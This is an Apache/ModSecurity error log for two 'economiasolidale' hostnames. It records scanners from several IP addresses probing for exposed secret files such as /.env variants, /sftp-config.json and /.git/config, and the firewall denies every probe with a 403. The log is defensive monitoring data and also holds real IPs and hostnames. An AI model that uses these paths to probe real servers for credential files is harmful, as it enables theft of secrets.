[Sun Apr 27 14:59:02.805886 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aA4qFhtlo-uNY69UwTqivgAAAAM"]
[Sun Apr 27 14:59:02.806123 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aA4qFhtlo-uNY69UwTqivgAAAAM"]
[Sun Apr 27 14:59:02.806312 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aA4qFhtlo-uNY69UwTqivgAAAAM"]
[Sun Apr 27 14:59:02.827022 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivwAAAAM"]
[Sun Apr 27 14:59:02.827263 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivwAAAAM"]
[Sun Apr 27 14:59:02.827432 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivwAAAAM"]
[Sun Apr 27 14:59:02.848028 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /settings/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aA4qFhtlo-uNY69UwTqiwAAAAAM"]
[Sun Apr 27 14:59:02.848307 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aA4qFhtlo-uNY69UwTqiwAAAAAM"]
[Sun Apr 27 14:59:02.848492 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/settings/.env"] [unique_id "aA4qFhtlo-uNY69UwTqiwAAAAAM"]
[Fri May 02 07:00:34.301231 2025] [:error] [pid 2871309] [client 170.39.218.52:42270] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBRRcnh15Acruu5gWFUwKwAAAAw"]
[Fri May 02 07:00:34.303637 2025] [:error] [pid 2871309] [client 170.39.218.52:42270] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBRRcnh15Acruu5gWFUwKwAAAAw"]
[Fri May 02 07:00:34.303894 2025] [:error] [pid 2871309] [client 170.39.218.52:42270] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBRRcnh15Acruu5gWFUwKwAAAAw"]
[Fri May 02 07:00:34.450739 2025] [:error] [pid 2869634] [client 170.39.218.52:42278] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBRRcgOM2M_aQp3iMvtO3QAAAAY"]
[Fri May 02 07:00:34.450993 2025] [:error] [pid 2869634] [client 170.39.218.52:42278] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBRRcgOM2M_aQp3iMvtO3QAAAAY"]
[Fri May 02 07:00:34.451179 2025] [:error] [pid 2869634] [client 170.39.218.52:42278] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBRRcgOM2M_aQp3iMvtO3QAAAAY"]
[Fri May 02 07:00:34.622700 2025] [:error] [pid 2871310] [client 170.39.218.52:42292] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBRRcuNbCEbSQDtWNwWhrgAAAA0"]
[Fri May 02 07:00:34.622950 2025] [:error] [pid 2871310] [client 170.39.218.52:42292] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBRRcuNbCEbSQDtWNwWhrgAAAA0"]
[Fri May 02 07:00:34.623135 2025] [:error] [pid 2871310] [client 170.39.218.52:42292] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBRRcuNbCEbSQDtWNwWhrgAAAA0"]
[Fri May 02 07:00:34.737269 2025] [:error] [pid 2869379] [client 170.39.218.52:42304] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBRRct6rIxceQLEbgwhpRgAAAAU"]
[Fri May 02 07:00:34.737513 2025] [:error] [pid 2869379] [client 170.39.218.52:42304] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBRRct6rIxceQLEbgwhpRgAAAAU"]
[Fri May 02 07:00:34.737680 2025] [:error] [pid 2869379] [client 170.39.218.52:42304] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBRRct6rIxceQLEbgwhpRgAAAAU"]
[Fri May 02 07:00:36.290015 2025] [authz_core:error] [pid 2871310] [client 170.39.218.52:42372] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Fri May 02 07:00:36.381348 2025] [:error] [pid 2869379] [client 170.39.218.52:42388] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBRRdN6rIxceQLEbgwhpRwAAAAU"]
[Fri May 02 07:00:36.381595 2025] [:error] [pid 2869379] [client 170.39.218.52:42388] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBRRdN6rIxceQLEbgwhpRwAAAAU"]
[Fri May 02 07:00:36.381767 2025] [:error] [pid 2869379] [client 170.39.218.52:42388] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aBRRdN6rIxceQLEbgwhpRwAAAAU"]
[Sat May 03 22:06:21.315039 2025] [:error] [pid 2906650] [client 35.181.49.192:57751] [client 35.181.49.192] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aBZ3PZ3CD8_9Bl-QJ5aaiQAAAAE"]
[Sat May 03 22:06:21.315310 2025] [:error] [pid 2906650] [client 35.181.49.192:57751] [client 35.181.49.192] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aBZ3PZ3CD8_9Bl-QJ5aaiQAAAAE"]
[Sat May 03 22:06:21.319889 2025] [:error] [pid 2906650] [client 35.181.49.192:57751] [client 35.181.49.192] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aBZ3PZ3CD8_9Bl-QJ5aaiQAAAAE"]
[Sun May 04 01:36:37.119047 2025] [:error] [pid 2910435] [client 13.201.52.161:58572] [client 13.201.52.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aBaohdAfzZ3-x2YoQq4lrgAAAAM"]
[Sun May 04 01:36:37.119384 2025] [:error] [pid 2910435] [client 13.201.52.161:58572] [client 13.201.52.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aBaohdAfzZ3-x2YoQq4lrgAAAAM"]
[Sun May 04 01:36:37.119566 2025] [:error] [pid 2910435] [client 13.201.52.161:58572] [client 13.201.52.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aBaohdAfzZ3-x2YoQq4lrgAAAAM"]
[Sun May 04 14:00:40.169824 2025] [:error] [pid 2912229] [client 170.39.218.52:35072] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBdW6CPxNWSrdShq1hDqXAAAAAM"]
[Sun May 04 14:00:40.170136 2025] [:error] [pid 2912229] [client 170.39.218.52:35072] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBdW6CPxNWSrdShq1hDqXAAAAAM"]
[Sun May 04 14:00:40.170346 2025] [:error] [pid 2912229] [client 170.39.218.52:35072] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aBdW6CPxNWSrdShq1hDqXAAAAAM"]
[Sun May 04 14:00:40.282526 2025] [:error] [pid 2913810] [client 170.39.218.52:35088] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBdW6CdSnwFsdNsJOj2CJwAAAAk"]
[Sun May 04 14:00:40.282782 2025] [:error] [pid 2913810] [client 170.39.218.52:35088] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBdW6CdSnwFsdNsJOj2CJwAAAAk"]
[Sun May 04 14:00:40.282989 2025] [:error] [pid 2913810] [client 170.39.218.52:35088] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aBdW6CdSnwFsdNsJOj2CJwAAAAk"]
[Sun May 04 14:00:40.410160 2025] [:error] [pid 2912449] [client 170.39.218.52:35096] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBdW6E_6dwbLHsUc7ZY6KgAAAAg"]
[Sun May 04 14:00:40.410459 2025] [:error] [pid 2912449] [client 170.39.218.52:35096] [client 170.39.218.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBdW6E_6dwbLHsUc7ZY6KgAAAAg"]
[Sun May 04 14:00:40.410650 2025] [:error] [pid 2912449] [client 170.39.218.52:35096] [client 170.39.218.52] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aBdW6E_6dwbLHsUc7ZY6KgAAAAg"]
[Sun May 04 14:00:40.523150 2025] [:error] [pid 2912448] [client 170.39.218.52:35104] [client 170.39.218.52] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aBdW6G8SHJtYYpgVqYEQHAAAAAc"]
